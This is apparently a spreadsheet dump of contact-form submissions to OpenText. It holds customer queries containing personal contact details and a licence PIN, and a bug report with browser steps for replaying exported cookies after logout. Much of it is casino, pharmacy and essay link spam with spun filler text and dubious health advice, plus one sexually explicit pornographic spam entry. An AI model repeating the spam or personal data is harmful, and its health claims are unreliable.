Invalidate all sessions upon password change._x000D_
_x000D_
BUG # 02_x000D_
_x000D_
Bug Type : Cookie Fixation ( Possible Account Takeover )_x000D_
Checked in : Firefox 27.0 _x000D_
OS : Windows 10_x000D_
_x000D_
Steps To Reproduce :_x000D_
_x000D_
1.open chrome and download edit this cookie ad-don_x000D_
2.now open https://login.opentext.com and log in _x000D_
3.now go to edit this cookie add-on and click export all cookies ...by clicking this we get the cookie copied in clipboard.._x000D_
4.logout from your https://login.opentext.com_x000D_
5.if needed u can close and open your browser._x000D_
6.now again go to https://lo</t>
  </si>
  <si>
    <t>We are missing the January invoice for account WVDA477109 and we need a copy.</t>
  </si>
  <si>
    <t xml:space="preserve">We have not received our renewal notice for 2018 yet.  The old manager of the clinic is no longer here and I think it went to her email that is not available anymore.  The new manager of the clinic is me, Christine Fraser.  Your team has gotten me set up to sign in now. Can you help me out on this. </t>
  </si>
  <si>
    <t>free real money casino no deposit _x000D_
[url=http://casinoline17.com/]free real money casino no deposit[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;best online casino&lt;/a&gt; _x000D_
online gambling casino</t>
  </si>
  <si>
    <t>Prezados Srs. Com vistas à realização de Pesquisa de Preços para futura contratação dos produtos Keyfile e Keyflow juntamente com suporte técnico, solicito a gentileza de nos enviar uma lista de representantes da Opentext autorizados a comercializar licenças e prestar o referido serviço de suporte. Desde já agradeço pela gentileza. Meus contatos: devair@senado.leg.br; sacti@senado.leg.br; fone: +55 (61) 3303-2631</t>
  </si>
  <si>
    <t>best online casino games free _x000D_
[url=http://casinobablogames.com/]free real money casino no deposit[/url] _x000D_
&lt;a href="http://casinobablogames.com/"&gt;casino games slots free heart of vegas&lt;/a&gt; _x000D_
new usa online casinos 2017</t>
  </si>
  <si>
    <t>I cant install brava, please help me this is the info:_x000D_
Dear Fujikura Automotive Mexico,_x000D_
Having trouble downloading?_x000D_
If you are having trouble downloading our software, please let us know by opening a support ticket on My Support &lt;http://support.opentext.com&gt;. If you are not able to sign into My Support please contact your nearest support office &lt;http://www.opentext.com/2/global/company/company-contact.html&gt;._x000D_
Order related questions._x000D_
For order, pricing or invoice related questions, please send an email to IGC_Sales@opentext.com_x000D_
_________________________________________x000D_
_x000D_
Thank you for your business. Please read this entire email to obtain your Brava! Desktop TX 16.3 software._x000D_
Product Description: Brava! Desktop TX_x000D_
Product Version: 16.3_x000D_
_x000D_
Software ID: E8D6AD595C9744CC9104588F6F2DFF15_x000D_
Software PIN: IGC460322_x000D_
Prerequisite: Previous versions of the purchased product must be uninstalled prior to installing your purchased version._x000D_
•	Obtain your license key_x000D_
o	Please visit: http://support.opentext.com and follow the below steps:_x000D_
	Click on Accounts on the Top Menu_x000D_
	Select Activations/Keys_x000D_
	On the Product Activation Page Search for your IGC PIN_x000D_
	Click on the Produce License Key icon_x000D_
	Enter Required information to generate Key_x000D_
	Click Submit_x000D_
	Click Download File to obtain your License File_x000D_
	Open zip file and save IGCKey.lic to a retrievable location (i.e. Desktop)._x000D_
How to find my MAC ID:_x000D_
http://www.opentext.com/support/license-change-request-desktop/macaddress _x000D_
_x000D_
Repeat this process for any additional licenses. _x000D_
•	Download Software _x000D_
o	In a separate email, new customers will receive steps to obtain your login information._x000D_
You can find all other IGC Downloads at the below link: _x000D_
https://knowledge.opentext.com/knowledge/llisapi.dll/Open/61361356 _x000D_
_x000D_
Notes: For Network licenses, you must download the License Manager._x000D_
o	During install, choose option "Find location of IGCKey" and navigate to where "IGCKey.lic" is saved._x000D_
_x000D_
Thank you for your busine</t>
  </si>
  <si>
    <t>I have a question on Brava Desktop DXP licensing. We're currently using the free version which will stop working in a few days. Now I've seen that also "Network licenses" are offered. Am I right in assuming that with this network license only the concurrent usage is counted? Is this possible to run Brava Desktop DXP with network license also on a Citrix farm? (I didn't find any information around this on the website). Thanks and best regards_x000D_
Jürgen Kamedler</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
If you wish for to get a great deal from this post then you have to apply these methods to your won weblog. _x000D_
------------------------------------------ _x000D_
http://megasto.com.ua _x000D_
 _x000D_
f7rpf9Sg6L</t>
  </si>
  <si>
    <t>Dear OpenText Team_x000D_
We are looking for ETalk-Qfinity support services, as far as I know, this SW product was acquired by OpenText, please could you be so kind to confirm it, if so your support to indicate us the right contact._x000D_
I really appreciate your prompt response._x000D_
Regards,</t>
  </si>
  <si>
    <t xml:space="preserve">Unable to login to download new Exceed software._x000D_
_x000D_
When I try to login to the website, I get the below error: _x000D_
Server maintenance is in underway. Please wait_x000D_
_x000D_
is this a genuine message or an error of some kind._x000D_
_x000D_
thanks. </t>
  </si>
  <si>
    <t>free real money casino no deposit _x000D_
[url=http://casinoline17.com/]casino online[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;new usa online casinos 2017&lt;/a&gt; _x000D_
online gambling casino</t>
  </si>
  <si>
    <t xml:space="preserve">User's PC was re-imaged and need to reinstall RightFax client. Where can I download the software? Version is RightFax FaxUtil 10.5.0.895_x000D_
</t>
  </si>
  <si>
    <t>AminoBoosters are 3-7 times more affordable as Laminine by LPGN http://www.getyourboomback.com/#_l_2ox  _x000D_
 _x000D_
[url=http://youtu.be/INzunr0RQf4]Предлагаю Рассылку ценой $10 На месяц на 30 млн. сайтов круглосуточно[/url] _x000D_
 _x000D_
[url=http://ny8.ru/543485529]Заработать 1 щелчком мышки до 9 млн. рублей внеся 1 раз 9 usd или Абсолютно бесплатно[/url]</t>
  </si>
  <si>
    <t>Informations required about your fax service, your prompt respond will be highly appreciated._x000D_
Contact details stated below._x000D_
_x000D_
Ray Rehlander_x000D_
Director of Field Operations_x000D_
LARSON-DANIELSON CONSTRUCTION COMPANY_x000D_
302 Tyler Street_x000D_
La Porte, IN 46360_x000D_
TEL: 219-336-2028_x000D_
FAX: 219-362-2848_x000D_
E-mail: ldconstruction@contractor.net_x000D_
www.ldconstruction.com</t>
  </si>
  <si>
    <t>best online casino games free _x000D_
[url=http://casinoline17.com/]casino slots[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;casinos online&lt;/a&gt; _x000D_
best online casino</t>
  </si>
  <si>
    <t>Information's required about webfax._x000D_
_x000D_
Ray Rehlander_x000D_
Director of Field Operations_x000D_
LARSON-DANIELSON CONSTRUCTION COMPANY_x000D_
302 Tyler Street_x000D_
La Porte, IN 46360_x000D_
TEL: 219-336-2028_x000D_
FAX: 219-362-2848_x000D_
E-mail: ldconstruction@contractor.net</t>
  </si>
  <si>
    <t>Good morning, from Larson-Danielson, we request for more information's about your webfax sending service, i can be reach with my direct contact details stated below._x000D_
_x000D_
Ray Rehlander_x000D_
Director of Field Operations_x000D_
LARSON-DANIELSON CONSTRUCTION COMPANY_x000D_
302 Tyler Street_x000D_
La Porte, IN 46360_x000D_
TEL: 219-336-2028_x000D_
FAX: 219-362-2848_x000D_
E-mail:  ldconstruction@contractor.net</t>
  </si>
  <si>
    <t>Hello,_x000D_
We use your applications OpenText for archive and storage management services + the invoice capture centre services in our company. We want to know what is the current release (version) from both applications and how long the version 10.5.0 for the archive and storage management services and the version 7.0 for the invoice capture centre services is supported by your company._x000D_
Thank you for your help._x000D_
_x000D_
Kind regards_x000D_
Leandro Amacher</t>
  </si>
  <si>
    <t>Boa Tarde,_x000D_
Gostaria de receber informações de como funciona o sistema de automatização da entrada da Nota Fiscal para o Recebimento Fiscal.</t>
  </si>
  <si>
    <t>Please, I could not see where to delete account on the page. I need my opentext account deleted. Thanks,</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.asia-schneider.com/css/session.asp?language=67-Cialis-France-Prix-Vend-Kamagra-Paris-Levitra-20mg-DurÃ©e-Daction]Cialis France Prix[/url]_x000D_
 A technique so that you can cease traumas caused by piles is usually to carefully drive it directly into your anus. If your piles continue to be sufficiently small, you could possibly have them back inside of. This could stop any apparel rubbing them and can guard them from injury. Should your hemorrhoids are too huge and harm actually terribly, don't endeavor carrying this out and danger serious trauma._x000D_
  [url=http://www.komutplastik.com/css/list.asp?id=99]Cialis Original Belgique[/url]_x000D_
 When selling your property, ensure you particularly checklist any goods which are not contained in the purchase so you don't find yourself in the struggle over products like lighting fixtures or chandeliers during the time of transaction. This will likely eradicate ruining your transaction since the buyer was wanting something different than you had in your mind._x000D_
  [url=http://www.superstationmedia.com/admin/login.php?saaa=374-Levitra-Schweiz-Ohne-Rezept-Viagra-Kamagra-Levitra-Original-Holland.html]Levitra Schweiz Ohne Rezept[/url]_x000D_
 In relation to working with despression symptoms, try and get a minimum of a few momemts of sunlight per day. This is important due to the fact not only is this creatively soothing, although the results of a average quantity of ultra violet rays may actually have got a positive result on your current feeling._x000D_
  [url=http://www.chiangraiekkachai.com/images/document.asp?tui=696]Viagra Sans Ordonnance En France[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We are currently exploring the possibilities of implementing a new DAM system in our global offices. Therefore, we would like to book a demo for our Global systems team to understand your product. _x000D_
_x000D_
Regards,_x000D_
Julian </t>
  </si>
  <si>
    <t>Привет всем! Класный у вас сайт _x000D_
Нашел прикольные сервера cs 1 6 training http://serveracs16.net/ : _x000D_
[url=http://serveracs16.net/game/cs] сервера cs 1 6 rank [/url] _x000D_
[url=http://serveracs16.net/game/csgo] самые лучшие сервера кс го [/url] _x000D_
[url=http://serveracs16.net/game/source] защита css сервера [/url] _x000D_
И тут нашёл много интересных новостей про игры и сервера: _x000D_
http://serveracs16.net/server_info/91.247.1.3:27149:27149/</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking for DAM to manage our content team files across multiple global regions and would like to discuss the opentext media management tool. </t>
  </si>
  <si>
    <t>Hello,_x000D_
For info, it seems that the Birt's demo site is down :_x000D_
http://demo.actuate.com/demos/EclipseDemo/EclipseDemo.html_x000D_
Best regards,_x000D_
David Clesse</t>
  </si>
  <si>
    <t>Привет всем!  Класный у вас сайт _x000D_
Нашел прикольные сервера cs 1.6 на этом сайте: http://serveracss.net/ : _x000D_
[url=http://serveracss.net/game/cs] модели для сервера кс 1 6 [/url] _x000D_
[url=http://serveracss.net/game/csgo] мониторинг серверов кс го маньяк [/url] сервера кс го онлайн _x000D_
[b] админ css сервер [/b] http://serveracss.net/game/source _x000D_
[url=http://serveracss.net/game/minecraft] сервера майнкрафт с кс го [/url] minecraft server 1 2 _x000D_
И тут нашёл много интересных новостей про игры и сервера: _x000D_
http://serveracss.net/server_info/195.88.208.190:27020/</t>
  </si>
  <si>
    <t>best online casino games free _x000D_
[url=http://casinoline17.com/]casinos online[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;free online casino slots&lt;/a&gt; _x000D_
vegas casino games</t>
  </si>
  <si>
    <t>Potential demonstration for our Client</t>
  </si>
  <si>
    <t>tender for management of our corporate processes (GDPR). can you be part in that tender?</t>
  </si>
  <si>
    <t xml:space="preserve">Amazing website, how do you find all this information?I've read a few articles on your website and I like your writing style. Thanks a million, keep up the great work. _x000D_
http://www.frutopija.com/techniques-on-lab-report-writing-23/_x000D_
http://wlasny-styl.pl/help-me-do-admission-application-essay/authority-essay-producing-assistance-is-your-3/_x000D_
</t>
  </si>
  <si>
    <t>buy</t>
  </si>
  <si>
    <t xml:space="preserve">I am amazed. I do not think I know anyone who understands just as much about the topic. You should make a career of it, honestly, impressive blog _x000D_
http://makcar.bozon.pl/admission-application-and-academic-essays-175/_x000D_
http://spoughts.co.uk/2016/11/14/how-online-writing-services-guide-students-176/_x000D_
</t>
  </si>
  <si>
    <t>Technical issue opentext product support requirement</t>
  </si>
  <si>
    <t xml:space="preserve">it's my first time visiting your website and I am very interested. Many thanks for sharing and keep up ;) _x000D_
https://www.preisdienst.at/2017/03/16/internet-based-composing-companies-a-blessing-for-2/_x000D_
http://mpbajka.elk.edu.pl/2016/07/21/essays-and-its-altering-aspects-of-importance-with-113/_x000D_
</t>
  </si>
  <si>
    <t>Привет всем участникам!  Класный у вас сайт _x000D_
Нашел прикольные сервера cs 1.6 на этом сайте: http://cs-servers-monitoring.ru/ : _x000D_
[url=http://cs-servers-monitoring.ru/game/cs] бесплатный мониторинг серверов кс 1 6 [/url] _x000D_
[b] сервера на прохождение в кс го [/b] http://cs-servers-monitoring.ru/game/csgo _x000D_
[b] сервера css v34 zombie [/b] http://cs-servers-monitoring.ru/game/source _x000D_
[url=http://cs-servers-monitoring.ru/game/minecraft] сервера майнкрафт с бедварсом [/url] файлы для сервера minecraft _x000D_
И тут нашёл много интересных новостей про игры и сервера: _x000D_
http://cs-servers-monitoring.ru/news/1959-outlast-i-dvoynoy-udar-v-pryamom-jefire-igromanii.html</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.aguasnaturales.com/ejemplos/redirect.asp?page=219-Kamagra-Oral-Jelly-Paypal-Kamagra-Gel-Viagra-Uk-Meds]Kamagra Oral Jelly Paypal[/url]_x000D_
 Acquire all of your beloved songs to the phone whenever you want. You have the flexibility to period out songs through your pc constantly, so getting many different songs is definitely an option by having an iphone 4. Stay informed about your best bands and possess their most up-to-date audio in your phone every time it will come out._x000D_
  [url=http://www.ugurevci.com/images/access.asp?k=153-Kamagra-Oral-Jelly-Effet-Levitra-Generique-Forum-Viagra-25-Mg-Prix]Kamagra Oral Jelly Effet[/url]_x000D_
 When your child is open up and truthful with you, praise him for his openness and honesty. This will promote him to talk to you about everything that is on his thoughts, and enhance the connection in between the both of you. Your child will sense safer understanding that they can come your way at whenever to go about everything that is bothering him._x000D_
  [url=http://www.mood.com.tr/Fonts/user.asp?ty=342-Achat-Levitra-Sans-Ordonnance-Achat-Kamagra-Oral-Jelly-Suisse-Viagra-Sans-Ordonnance-En-Pharmacie-En-France]Achat Levitra Sans Ordonnance[/url]_x000D_
 A lot of companies market you could exchange amounts onto them and carry a reduce rate of interest. This sounds appealing, but you have to carefully take into account your choices. Think about it. If a firm consolidates an increased amount of money onto one particular card and therefore the rate of interest spikes, you might have a hard time making that settlement. Understand all the terms and conditions, and be cautious._x000D_
  [url=http://www.analizizmir.com/arama/system.asp?kirtasiye=241]Kamagra Doctissimo[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">It is a great article. This site is loaded with lots of interesting things, it made it easier for me in many ways. _x000D_
http://www.bosqueverdelodge.com/en/choose-custom-made-essays-and-acquire-away-from/_x000D_
http://dev1.righthere.com/admission-software-and-academic-essays-150/_x000D_
</t>
  </si>
  <si>
    <t>need the prices for your LMS Platform</t>
  </si>
  <si>
    <t>Recruitment Query._x000D_
_x000D_
I have applied for job opportunities, How do I get to know the status._x000D_
Please advise.</t>
  </si>
  <si>
    <t>Open Text for SharePoint ECM</t>
  </si>
  <si>
    <t>http://whore.msk.ru/page/mujiki-trahayut-blyad/ _x000D_
Телок дерут в попки, суют им в анус разные предметы и кончают в анал парни жестко ебут девушек в жопу своими большими членами.  Телефоны шлюх и анал с худой попкой перед.  Отодрав старую убогую суку в анал а также: маму в жопу, маму в попу, 40 лет анал, трахнул спящую в жопу, большая жопа анал зрелые.  трахать столь непривлекательных шлюх и 11:53 парни жестко трахают шлюхsixinch, анал.  Скачать бесплатно трахать шлюх и трахает их в.  и даже дать трахнуть её в анал трахать в.  шлюх в чулках анал- bdsm- фетиш.  mad vagina: трахать, пизда как трахать шлюх +1.  Популярные категории а его сын продолжал трахать меня в рот.  c- cборники- d- d автобусе- А- Анал в первый раз Трахать жестоко шлюху «но отец.  Они втроем начали жестко трахать пьяную шлюху, кончая прямо в нее два зрелых трахают шлюху в анал.  Так больно ей в анал так в в очередь чтобы трахать шлюху в.  где тех еще шлюх приходуют в анал трахает двух шлюх.  трахать вас в анал клип шлюх трахают в жопу где отменная фотомодель красиво поглаживает свои сладкие сиськи.  Смотрите Порно фото анал трахают жестко двух шлюх в анал.  трахнуть их прямо в попку парни с большими членами долбят двух шлюх по полной.  загибать раком или трахать их чувак трахает двух похотливых связанных шлюх жену и любовницу в анал.  Два парня вызволи себе двух шлюх красавчику пришлось.  Нацепили на них цепи, и принялись их трахать в жопу анал- арабское.  Супер трахать и где скачать наруто? жесткое дылдо в анал фото, смотреть бесплатно порна молодые и горячие парни отлично трахают пикантных шлюх в. _x000D_
http://whore.msk.ru/page/mujiki-trahayut-blyad/</t>
  </si>
  <si>
    <t>best online casino _x000D_
[url=http://casinobablogames.com/]casino slots[/url] _x000D_
&lt;a href="http://casinobablogames.com/"&gt;casino games real money&lt;/a&gt; _x000D_
online gambling casino</t>
  </si>
  <si>
    <t>free online casino slots _x000D_
[url=http://casinoline17.com/]online casino real money[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;online casinos for us players&lt;/a&gt; _x000D_
new usa online casinos 2017</t>
  </si>
  <si>
    <t>slot game _x000D_
[url=http://casinoline17.com/]casino games[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;casinos online&lt;/a&gt; _x000D_
casino online loc us</t>
  </si>
  <si>
    <t>I cannot get access to resources for Gupta products and urgently require install sqlbase on new server of my client HALYPS DOMIKA ILIKA S.A</t>
  </si>
  <si>
    <t>Looking to make our incoming faxes easier to manage</t>
  </si>
  <si>
    <t>casino games slots free heart of vegas _x000D_
[url=http://casinobablogames.com/]online casino gambling[/url] _x000D_
&lt;a href="http://casinobablogames.com/"&gt;pogo casino slots&lt;/a&gt; _x000D_
online casino real money</t>
  </si>
  <si>
    <t xml:space="preserve">Hi while sorting out our house I just found an original old boxed "SoftArc, Inc. FirstClass Server for Macintosh v2.6" boxed, with Floppy Disks still as new (unused). Before I put it on eBay (though I have an old 68k mac ready and running I won't run this Server anymore) I ask wether OpenText that overtook Softarc Inc that means Centrinity Inc has any interest of buying/getting this box. </t>
  </si>
  <si>
    <t>Hi,_x000D_
We are looking for EDI provider for Europe._x000D_
Thanks,_x000D_
Adi</t>
  </si>
  <si>
    <t>Quotation for RightFax</t>
  </si>
  <si>
    <t>Hello there!_x000D_
_x000D_
My name is Grana and I own an accessories brand called ‘Le Pom Pom’. We will be supplying Nordstroms with our products very soon, but they need us to have a UPC Catalogue and recommended you. _x000D_
_x000D_
Could you please advise the steps to create the catalogue? We are interested in working with you and would appreciate your reply at the earliest._x000D_
_x000D_
Looking forward to hearing from you.</t>
  </si>
  <si>
    <t>online casino real money _x000D_
[url=http://casinoline17.com/]best online casino games free[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;pogo casino slots&lt;/a&gt; _x000D_
free casino games and poker</t>
  </si>
  <si>
    <t>casino games _x000D_
[url=http://casinobablogames.com/]online casino games[/url] _x000D_
&lt;a href="http://casinobablogames.com/"&gt;casino online loc us&lt;/a&gt; _x000D_
casino slots</t>
  </si>
  <si>
    <t>Is there a reseller in Dubai who can come to our office to show us demo about OpenText?</t>
  </si>
  <si>
    <t>pogo casino slots _x000D_
[url=http://casinoline17.com/]online gambling casino[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;kasino&lt;/a&gt; _x000D_
online casino no deposit bonus</t>
  </si>
  <si>
    <t>асфальтирование двора в краснодаре_x000D_
благоустройство цена в краснодаре_x000D_
управление коммунального хозяйства и благоустройства мо краснодар_x000D_
тендеры в краснодаре благоустройство_x000D_
проблемы благоустройства краснодара_x000D_
 _x000D_
---------------------- _x000D_
http://благоустройство-краснодар.рф/</t>
  </si>
  <si>
    <t xml:space="preserve">Is your Chicago office still open? </t>
  </si>
  <si>
    <t>aol games free casino _x000D_
[url=http://casinoline17.com/]pogo casino slots[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;free casino games and poker&lt;/a&gt; _x000D_
new usa online casinos 2017</t>
  </si>
  <si>
    <t>casino games slots free heart of vegas _x000D_
[url=http://casinoline17.com/]casino games free[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;casinos online&lt;/a&gt; _x000D_
free real money casino no deposit</t>
  </si>
  <si>
    <t>online casino _x000D_
[url=http://casinoline17.com/]pogo casino slots[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;casino online free&lt;/a&gt; _x000D_
online casino no deposit bonus</t>
  </si>
  <si>
    <t>online casino gambling _x000D_
[url=http://casinobablogames.com/]casino online for fun[/url] _x000D_
&lt;a href="http://casinobablogames.com/"&gt;casino games&lt;/a&gt; _x000D_
slot online</t>
  </si>
  <si>
    <t>just wanted to double check.  Is the free dwg viewer the same as the dx-p viewer for $65.00?  _x000D_
because your free viewer is set to stop on feb. 28th  2018</t>
  </si>
  <si>
    <t>slot game _x000D_
[url=http://casinoline17.com/]casino games roulette[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;online casinos for us players&lt;/a&gt; _x000D_
free real money casino no deposit</t>
  </si>
  <si>
    <t>online casino slots _x000D_
[url=http://casinobablogames.com/]best online casino games free[/url] _x000D_
&lt;a href="http://casinobablogames.com/"&gt;casinos online&lt;/a&gt; _x000D_
casino slots</t>
  </si>
  <si>
    <t>pogo casino slots _x000D_
[url=http://casinobablogames.com/]free online casino slots[/url] _x000D_
&lt;a href="http://casinobablogames.com/"&gt;free casino games and poker&lt;/a&gt; _x000D_
online casino slots</t>
  </si>
  <si>
    <t>free casino games and poker _x000D_
[url=http://casinoline17.com/]casino games real money[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;online casino slots&lt;/a&gt; _x000D_
casino games slots</t>
  </si>
  <si>
    <t>supplements for weight loss _x000D_
[url=http://regimenforfeit.com/]appetite suppressant[/url] _x000D_
&lt;a href="http://regimenforfeit.com/"&gt;diet pills&lt;/a&gt; _x000D_
best diet pills</t>
  </si>
  <si>
    <t xml:space="preserve">Awesome site, how do u find all this info?I've read through a few posts on your site and I really like your style. Thanks a million, keep up the great work. _x000D_
http://www.veysport.nl/workouts/bootcamp-maandag-2-2015-08-03/_x000D_
</t>
  </si>
  <si>
    <t>online casinos for us players _x000D_
[url=http://casinoline17.com/]best online casino games free[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;casino online&lt;/a&gt; _x000D_
casino games slots free heart of vegas</t>
  </si>
  <si>
    <t>play casinos _x000D_
[url=http://casinoline17.com/]top rated free online casino games[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;kasino&lt;/a&gt; _x000D_
casino games free</t>
  </si>
  <si>
    <t xml:space="preserve">"Re: Google Manual Action Penalties_x000D_
_x000D_
Hello,_x000D_
_x000D_
My name is Joe and I am a Digital Marketing Specialists for a Creative Agency._x000D_
I was doing some industry benchmarking for a client of mine when I came across your website._x000D_
I noticed a few technical errors which correspond with a drop of website traffic over the last 6-8 months which I thought I would bring to your attention._x000D_
After closer inspection it appears your site is lacking in 4 key criteria._x000D_
_x000D_
1- Website Speed_x000D_
2- Link Diversity_x000D_
3- Domain Authority_x000D_
4- Competition Comparison_x000D_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Name, company’s website address (mandatory) and /or phone number._x000D_
_x000D_
Regards,_x000D_
Joe Root_x000D_
joeseomarketing1@gmail.com_x000D_
"_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>prescription weight loss pills _x000D_
[url=http://regimenforfeit.com/]appetite suppressant[/url] _x000D_
&lt;a href="http://regimenforfeit.com/"&gt;new weight loss medication&lt;/a&gt; _x000D_
appetite suppressants that work</t>
  </si>
  <si>
    <t xml:space="preserve">Awesome! This might be by far the most useful thing on the subject I've ever found. Many thanks for your work. _x000D_
http://nev-calconst.com/?p=3991_x000D_
</t>
  </si>
  <si>
    <t>weight loss medication _x000D_
[url=http://regimenforfeit.com/]whats the best weight loss supplement[/url] _x000D_
&lt;a href="http://regimenforfeit.com/"&gt;weight loss pills that work&lt;/a&gt; _x000D_
weight loss drugs prescription</t>
  </si>
  <si>
    <t xml:space="preserve">Not too long ago I've come across one post which I assume you can find helpful. Someone might take a steaming dump all over it, however it answered some of my questions. _x000D_
https://singularityevent.com/custom-essay-writing-order-your-essay-today-1668/_x000D_
</t>
  </si>
  <si>
    <t>We want the prices for the license and more details</t>
  </si>
  <si>
    <t xml:space="preserve">I'm impressed. I don't think I know anybody who understands so much about this as you do. You need to make a career of it, honestly, great blog _x000D_
http://elifert.ee/help-me-do-admission-application-essay/custom-essay-writing-order-your-essay-today-1662/_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks for a really wonderful blog. It was very useful. I am just so glad I discovered this. _x000D_
http://unitedenglish.com.ar/essays-to-buy-service/figure-out-the-right-way-to-get-professional-3/_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Recently I have come across one article which I assume you could find helpful. Somebody might take a steaming dump all over it, however it clarified some of my questions. _x000D_
http://quintobelle.com/what-is-much-better-essay-writing-by-your-self-or-198/_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Olá Prezados, Boa noite_x000D_
Poderia me informar se há vagas na área administrativa? Ou algum e-mail que eu possa encaminhar meu currículo? _x000D_
_x000D_
Atenciosamente, Sabrina_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks for the site, it is filled with a lot of useful info. This . _x000D_
http://invest-if.com/proven-methods-to-write-an-spectacular-admission-5/_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, we are a family owned business from Las Vegas, Nevada who specialize in building custom exhibits for trade shows. Please let me know if you would be interested in a price and/or a design for the HIMSS Expo. I appreciate your time, thank you very much. </t>
  </si>
  <si>
    <t>Need pricing for the OpenText Capture Center license renewal for the Period of Performance is March 1, 2018 through February 28, 2019 (1000023244). Capture Center Unlimited Field Extraction Term License - Max. Pages/Term QTY - 750,000</t>
  </si>
  <si>
    <t>Market Research - Feasibility and need Pricing/Licensing &amp; Labor costs</t>
  </si>
  <si>
    <t>Hello, _x000D_
_x000D_
I am a fourth year Media Arts &amp; Technology major at the Rochester Institute of Technology. This semester I am taking a Database Publishing class; for a group presentation, I am tasked with creating an analysis of your product OpenText xPresso. I have a couple of questions about the software, as I was confused reading the given information on your website. My first question is: Which Raster Image Processors are supported by OpenText xPresso? My second question is: What is the maximum amount of data, OpenText xPresso supports? My final question is: What is the current price of the software? I hope to hear from someone soon. I am interested in learning more about this software and how it compares to other VDPs._x000D_
_x000D_
Thank you,_x000D_
River Hoffman</t>
  </si>
  <si>
    <t>Good afternoon, would you please be able to give me the name and email address of the person in charge of your company’s energy management?  Thank you, Carla</t>
  </si>
  <si>
    <t>I would like an invoice for Reference number RC 181016</t>
  </si>
  <si>
    <t>Inquiring about Legal Hold Software</t>
  </si>
  <si>
    <t>Considering bringing our licenses back into support &amp; maintenance and need an estimate of cost to do so.</t>
  </si>
  <si>
    <t>Quote for EOD</t>
  </si>
  <si>
    <t>weight loss medications prescription _x000D_
[url=http://regimenforfeit.com/]weight loss supplements[/url] _x000D_
&lt;a href="http://regimenforfeit.com/"&gt;best weight loss supplement&lt;/a&gt; _x000D_
slimming tablets</t>
  </si>
  <si>
    <t>I have a financial services client that has a set of requirements that include: Employees from multiple locations (US, Non-US) need to access a common set of files in similar manner with consistent user experience while traveling_x000D_
File sharing and collaboration capabilities_x000D_
Document versioning_x000D_
Workflow functionality_x000D_
Improved front end file search capabilities (tagging)_x000D_
Document access permission security _x000D_
File management governance and administration _x000D_
Document store roadmap_x000D_
_x000D_
Is it possible to set up a web-ex type introductory demo (Either afternoon of February 26 or morning of February 27th) to display how OpenText can address their requirements?  Please let me know if this may be feasible.  I'm happy to discuss further.  Thank you for your consideration.</t>
  </si>
  <si>
    <t>please send us the Download for the Exceed 15 msi_x000D_
_x000D_
thanks a lot</t>
  </si>
  <si>
    <t xml:space="preserve">Dear OpenText Team, _x000D_
_x000D_
My name is Amir and I am an SMS Account Manager working with the leading SMS Hub, Monty Mobile, an International GSMA certified Hub connected globally to hundreds of countries and destinations and can deliver any text or SMS to anyone worldwide at much cheaper rates than the normal mobile networks. _x000D_
_x000D_
I was wondering if we can cooperate and offer you to use us for your SMS services whether it is for PIN verification, PIN sending for Apps activation or for promotion or marketing and Bulk SMS.  _x000D_
_x000D_
While we cover more than 230 Million End User with operators such as Orange, MTN, Etisalat, Skytel, Zain, TriMob, Telkomcel, Expresso, Plus and many others, we are equally connected to more than 450 Mobile Operators worldwide. _x000D_
_x000D_
I would be very thankful if you kindly redirect this message to the right POC if you are not the person in charge. _x000D_
_x000D_
Best Regards,_x000D_
_x000D_
Amir_x000D_
</t>
  </si>
  <si>
    <t>На первых этажах очень шумно и чувствуются автомобильные выхлопы. [url=https://xn--80aieocueqr8g.xn--p1ai]квартиры в мытищах до 3 млн[/url] предлагается в аренду отдельно стоящее здание на охраняемой территории комплекса. [url=https://xn--80aieocueqr8g.xn--p1ai]жк отрадный купить квартиру[/url]</t>
  </si>
  <si>
    <t>how do i access documentum community.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Excuse me, I made a mistake in my previous email._x000D_
1- Does OpenText Captiva OCR supports Arabic And Persian languages?_x000D_
2- If yes, How could We evaluate it?_x000D_
_x000D_
I prefer email as preferred communication method._x000D_
_x000D_
Regards,_x000D_
Hossein Mirheydari,_x000D_
DOX Tech._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
1- Does OpenText Datacap OCR supports Arabic And Persian languages?_x000D_
2- If yes, How could We evaluate it?_x000D_
_x000D_
I prefer email as preferred communication method._x000D_
_x000D_
Regards,_x000D_
Hossein Mirheydari,_x000D_
DOX Tech._x000D_
</t>
  </si>
  <si>
    <t>Hi there,_x000D_
_x000D_
I am interested in understanding more about your outlook integration._x000D_
_x000D_
Cheers,_x000D_
_x000D_
Stuart</t>
  </si>
  <si>
    <t>Rightfax notifications not working on some machines.</t>
  </si>
  <si>
    <t>I would like to know when Training will be available for Documentum 16.4 pack.</t>
  </si>
  <si>
    <t>We have RightFax version 10.50 Enterprise with 8 Channels. We are curious how much would it be to add an addional channel?</t>
  </si>
  <si>
    <t>Interested in high level pricing of Cloud DAM service.</t>
  </si>
  <si>
    <t>online casino _x000D_
